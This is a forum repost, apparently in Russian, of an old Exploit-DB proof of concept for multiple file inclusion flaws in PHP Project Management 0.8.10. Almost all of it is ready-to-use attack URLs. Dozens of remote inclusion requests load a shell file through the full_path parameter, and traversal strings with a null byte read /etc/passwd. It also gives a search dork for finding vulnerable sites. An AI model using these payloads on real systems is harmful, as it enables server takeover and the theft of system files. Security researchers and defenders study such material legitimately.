Exploit PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4549
Проверка EDB
  1. Пройдено
Автор
GOLD_M
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-5642 cve-2007-5641
Дата публикации
2007-10-21
Код:
#  PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities
#  http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz
#  DORK : "PHP Project Management 0.8.10"
#  POC : RFI
#  /modules/certinfo/index.php?full_path=http://localhost/shell.txt?
#  /modules/emails/index.php?full_path=http://localhost/shell.txt?
#  /modules/events/index.php?full_path=http://localhost/shell.txt?
#  /modules/fax/index.php?full_path=http://localhost/shell.txt?
#  /modules/files/index.php?full_path=http://localhost/shell.txt?
#  /modules/files/list.php?full_path=http://localhost/shell.txt?
#  /modules/groupadm/index.php?full_path=http://localhost/shell.txt?
#  /modules/history/index.php?full_path=http://localhost/shell.txt?
#  /modules/info/index.php?full_path=http://localhost/shell.txt?
#  /modules/log/index.php?full_path=http://localhost/shell.txt?
#  /modules/mail/index.php?full_path=http://localhost/shell.txt?
#  /modules/messages/index.php?full_path=http://localhost/shell.txt?
#  /modules/organizations/index.php?full_path=http://localhost/shell.txt?
#  /modules/phones/index.php?full_path=http://localhost/shell.txt?
#  /modules/presence/index.php?full_path=http://localhost/shell.txt?
#  /modules/projects/index.php?full_path=http://localhost/shell.txt?
#  /modules/projects/summary.inc.php?full_path=http://localhost/shell.txt?
#  /modules/projects/list.php?full_path=http://localhost/shell.txt?
#  /modules/reports/index.php?full_path=http://localhost/shell.txt?
#  /modules/search/index.php?full_path=http://localhost/shell.txt?
#  /modules/snf/index.php?full_path=http://localhost/she ll.txt?
#  /modules/syslog/index.php?full_path=http://localhost/shell.txt?
#  /modules/tasks/searchsimilar.php?full_path=http://localhost/shell.txt?
#  /modules/tasks/index.php?full_path=http://localhost/shell.txt?
#  /modules/tasks/summary.inc.php?full_path=http://localhost/shell.txt?
#  /modules/useradm/index.php?full_path=http://localhost/shell.txt?
#  /ajax/loadsplash.php?full_path=http://localhost/shell.txt?
#  /blocks/birthday.php?full_path=http://localhost/shell.txt?
#  /blocks/events.php?full_path=http://localhost/shell.txt?
#  /blocks/help.php?full_path=http://localhost/shell.txt?
#  POC : LFI
#  /modules/certinfo/index.php?module=../../../../../../etc/passwd%00
#  /modules/emails/index.php?module=../../../../../../etc/passwd%00
#  /modules/events/index.php?module=../../../../../../etc/passwd%00
#  /modules/fax/index.php?module=../../../../../../etc/passwd%00
#  /modules/files/index.php?module=../../../../../../etc/passwd%00
#  /modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00
#  /modules/groupadm/index.php?module=../../../../../../etc/passwd%00
#  /modules/history/index.php?module=../../../../../../etc/passwd%00
#  /modules/info/index.php?module=../../../../../../etc/passwd%00
#  /modules/log/index.php?module=../../../../../../etc/passwd%00
#  /modules/mail/index.php?module=../../../../../../etc/passwd%00
#  /modules/messages/index.php?module=../../../../../../etc/passwd%00
#  /modules/organizations/index.php?module=../../../../../../etc/passwd%00
#  /modules/phones/index.php?module=../../../../../../etc/passwd%00
#  /modules/presence/index.php?module=../../../../../../etc/passwd%00
#  /modules/projects/index.php?module=../../../../../../etc/passwd%00
#  /modules/projects/summary.inc.php?m_path=../../../../../../etc/passwd%00
#  /modules/projects/list.php?module=../../../../../../etc/passwd%00
#  /modules/reports/index.php?module=../../../../../../etc/passwd%00
#  /modules/search/index.php?module=../../../../../../etc/passwd%00
#  /modules/snf/index.php?module=../../../../../../etc/passwd%00
#  /modules/syslog/index.php?module=../../../../../../etc/passwd%00
#  /modules/tasks/index.php?module=../../../../../../etc/passwd%00
#  /modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00
#  /modules/useradm/index.php?module=../../../../../../etc/passwd%00

# milw0rm.com [2007-10-21]
 
Источник
www.exploit-db.com

Похожие темы